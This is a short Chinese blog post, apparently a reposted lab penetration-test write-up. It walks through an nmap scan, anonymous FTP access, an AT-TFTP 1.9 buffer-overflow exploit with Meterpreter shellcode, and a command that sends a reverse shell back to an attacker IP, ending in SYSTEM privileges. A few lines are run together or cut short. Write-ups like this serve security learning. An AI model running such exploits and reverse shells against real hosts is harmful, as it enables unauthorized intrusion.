本文共 781 字,大约阅读时间需要 2 分钟。
今天这篇文章将分享一个渗透测试中的实际案例,展示从信息收集到最终获得目标主机控制的完整过程。
开始进行服务和端口扫描:
# nmap -sT -Pn 10.11.1.226
扫描结果显示目标主机开放了ftp和RDP服务。初步测试发现,ftp服务支持匿名登录。
通过ftp服务,我们发现并下载了一个名为servers.py的Python脚本。进一步分析发现,该脚本用于启动ftp和tftp服务,具体涉及以下操作:
# cat servers.pyimport wmi, time, ftplib, tftpy
通过Google搜索,我们发现AT-TFTP 1.9存在一个缓冲区溢出漏洞(RCE)。利用Meterpreter反弹shell的生成工具,替换脚本中的shellcode代码,并运行:
# python atftp.py 10.11.1.226 69 10.11.0.74 9
最终,我们成功获得了一个Meterpreter反弹shell。
通过msf的反弹shell处理程序,迁移并提权至SYSTEM权限,完成渗透目标。
该案例的渗透思路总结如下:
servers.py脚本,发现其用于启动ftp和tftp服务。该案例展示了如何通过合理利用现有信息和漏洞,逐步实现渗透测试的目标。
转载地址:http://cfgc.baihongyu.com/